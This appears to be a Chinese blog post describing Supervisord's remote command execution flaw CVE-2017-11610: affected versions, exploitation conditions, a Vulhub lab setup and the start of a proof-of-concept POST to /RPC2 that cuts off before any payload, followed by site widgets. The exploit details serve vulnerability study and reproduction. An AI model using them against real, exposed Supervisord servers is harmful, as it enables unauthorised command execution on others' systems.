Supervisord 远程命令执行漏洞(CVE-2017-11610)

Supervisord 远程命令执行漏洞(CVE-2017-11610)

一、漏洞介绍

Supervisord是一款用Python语言开发的管理后台应用(服务)的工具,方便运维人员使用图形化界面进行管理。

Supervisord曾曝出了一个需认证的远程命令执行漏洞(CVE-2017-11610)。通过POST请求向Supervisord管理界面提交恶意数据,可以获取服务器操作权限,带来严重的安全风险。

利用条件:
Supervisor版本在受影响范围内
Supervisor 9001管理端口可以被外网访问
Supervisor未配置密码或使用弱密码

漏洞影响范围:
Supervisor version 3.1.2
Supervisor version 3.3.2

二、漏洞危害

利用该漏洞远程POST请求,向Supervisord管理界面提交恶意数据,可以获取服务器操作权限。

三、漏洞验证

环境搭建:
实验环境 系统 IP地址
攻击机 win10 192.168.18.7
靶机 win10 192.168.18.7:9001

这里我使用Vulhub搭建环境:
docker-compose build
docker-compose up -d
环境启动后,访问http://your-ip:9001即可查看Supervisord的页面。
在这里插入图片描述

PoC1(无回显):
POST /RPC2 HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en
User-Agent:
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值